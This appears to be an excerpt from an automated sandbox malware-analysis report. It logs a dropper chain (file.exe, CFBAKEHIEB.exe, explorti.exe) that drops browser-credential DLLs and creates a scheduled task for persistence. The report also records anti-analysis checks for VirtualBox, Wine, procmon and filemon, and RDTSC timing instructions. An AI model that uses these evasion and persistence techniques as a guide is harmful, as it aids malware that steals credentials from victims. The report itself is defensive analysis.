Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Section loaded: sfc_os.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: Google Drive.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.16.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: file.exe Static file information: File size 2533376 > 1048576
Source: file.exe Static PE information: Raw size of .data is bigger than: 0x100000 < 0x227400
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2482604755.000000006C78F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2482321906.000000006C5CD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.7b0000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Unpacked PE file: 7.2.CFBAKEHIEB.exe.370000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 11.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 12.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Unpacked PE file: 13.2.explorti.exe.640000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aosuufqe:EW;lxnltetw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Unpacked PE file: 14.2.0244247334.exe.720000.0.unpack Unknown_Section0:EW;Unknown_Section1:EW;Unknown_Section2:EW;Unknown_Section3:EW;Unknown_Section4:EW;.data:EW; vs Unknown_Section0:EW;Unknown_Section1:R;Unknown_Section2:W;Unknown_Section3:R;Unknown_Section4:EW;.data:EW;
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BC410 LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_6C5BC410
Source: initial sample Static PE information: section where entry point is pointing to: .data
Source: explorti.exe.7.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
Source: random[1].exe.13.dr Static PE information: real checksum: 0x0 should be: 0x271053
Source: CFBAKEHIEB.exe.0.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
Source: 0244247334.exe.13.dr Static PE information: real checksum: 0x0 should be: 0x271053
Source: file.exe Static PE information: real checksum: 0x0 should be: 0x271053
Source: amadka[1].exe.0.dr Static PE information: real checksum: 0x1da3d3 should be: 0x1dfe86
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name:
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: aosuufqe
Source: amadka[1].exe.0.dr Static PE information: section name: lxnltetw
Source: amadka[1].exe.0.dr Static PE information: section name: .taggant
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .idata
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name:
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: aosuufqe
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: lxnltetw
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: .taggant
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: .idata
Source: explorti.exe.7.dr Static PE information: section name:
Source: explorti.exe.7.dr Static PE information: section name: aosuufqe
Source: explorti.exe.7.dr Static PE information: section name: lxnltetw
Source: explorti.exe.7.dr Static PE information: section name: .taggant
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: 0244247334.exe.13.dr Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58B536 push ecx; ret 0_2_6C58B549
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_0065D82C push ecx; ret 13_2_0065D83F
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED525D0 push 7ED50002h; ret 14_2_7ED525DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50AD0 push 7ED50002h; ret 14_2_7ED50ADF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50DD0 push 7ED50002h; ret 14_2_7ED50DDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED510D0 push 7ED50002h; ret 14_2_7ED510DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED513D0 push 7ED50002h; ret 14_2_7ED513DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED516D0 push 7ED50002h; ret 14_2_7ED516DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED519D0 push 7ED50002h; ret 14_2_7ED519DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51CD0 push 7ED50002h; ret 14_2_7ED51CDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51FD0 push 7ED50002h; ret 14_2_7ED51FDF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED522D0 push 7ED50002h; ret 14_2_7ED522DF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED526C0 push 7ED50002h; ret 14_2_7ED526CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50BC0 push 7ED50002h; ret 14_2_7ED50BCF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50EC0 push 7ED50002h; ret 14_2_7ED50ECF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED511C0 push 7ED50002h; ret 14_2_7ED511CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED514C0 push 7ED50002h; ret 14_2_7ED514CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED517C0 push 7ED50002h; ret 14_2_7ED517CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51AC0 push 7ED50002h; ret 14_2_7ED51ACF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51DC0 push 7ED50002h; ret 14_2_7ED51DCF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED520C0 push 7ED50002h; ret 14_2_7ED520CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED523C0 push 7ED50002h; ret 14_2_7ED523CF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED526F0 push 7ED50002h; ret 14_2_7ED526FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED523F0 push 7ED50002h; ret 14_2_7ED523FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED508F0 push 7ED50002h; ret 14_2_7ED508FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50BF0 push 7ED50002h; ret 14_2_7ED50BFF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED50EF0 push 7ED50002h; ret 14_2_7ED50EFF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED511F0 push 7ED50002h; ret 14_2_7ED511FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED514F0 push 7ED50002h; ret 14_2_7ED514FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED517F0 push 7ED50002h; ret 14_2_7ED517FF
Source: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Code function: 14_2_7ED51AF0 push 7ED50002h; ret 14_2_7ED51AFF
Source: file.exe Static PE information: section name: entropy: 7.995194725278902
Source: file.exe Static PE information: section name: entropy: 7.976101280157095
Source: file.exe Static PE information: section name: entropy: 7.948506104133843
Source: amadka[1].exe.0.dr Static PE information: section name: entropy: 7.985769565429945
Source: amadka[1].exe.0.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: entropy: 7.985769565429945
Source: CFBAKEHIEB.exe.0.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: explorti.exe.7.dr Static PE information: section name: entropy: 7.985769565429945
Source: explorti.exe.7.dr Static PE information: section name: aosuufqe entropy: 7.952514674538918
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.995194725278902
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.976101280157095
Source: random[1].exe.13.dr Static PE information: section name: entropy: 7.948506104133843
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.995194725278902
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.976101280157095
Source: 0244247334.exe.13.dr Static PE information: section name: entropy: 7.948506104133843
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000006001\0244247334.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\amadka[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B55F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_6C5B55F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000007001\06f6d9547f.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55FEAB second address: 55FEBD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F12E0FAFC7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 548303 second address: 548313 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F12E108FDBCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55EFE5 second address: 55EFF8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jmp 00007F12E0FAFC7Bh 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2A3 second address: 55F2A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2A9 second address: 55F2B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2B2 second address: 55F2B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2B8 second address: 55F2BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F2BC second address: 55F2C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F426 second address: 55F42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F42B second address: 55F432 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 55F432 second address: 55F43A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5633B7 second address: 5633E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F12E108FDC8h 0x00000008 jg 00007F12E108FDB6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 5633E0 second address: 563454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F12E0FAFC76h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F12E0FAFC84h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 popad 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 push ebx 0x0000001a push ebx 0x0000001b pushad 0x0000001c popad 0x0000001d pop ebx 0x0000001e pop ebx 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 jng 00007F12E0FAFC84h 0x00000028 jmp 00007F12E0FAFC7Eh 0x0000002d push eax 0x0000002e jmp 00007F12E0FAFC87h 0x00000033 pop eax 0x00000034 popad 0x00000035 mov dword ptr [esp+04h], eax 0x00000039 push esi 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007F12E0FAFC7Eh 0x00000041 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 563583 second address: 563589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 563589 second address: 56358D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\CFBAKEHIEB.exe RDTSC instruction interceptor: First address: 56385B second address: 563865 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F12E108FDB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
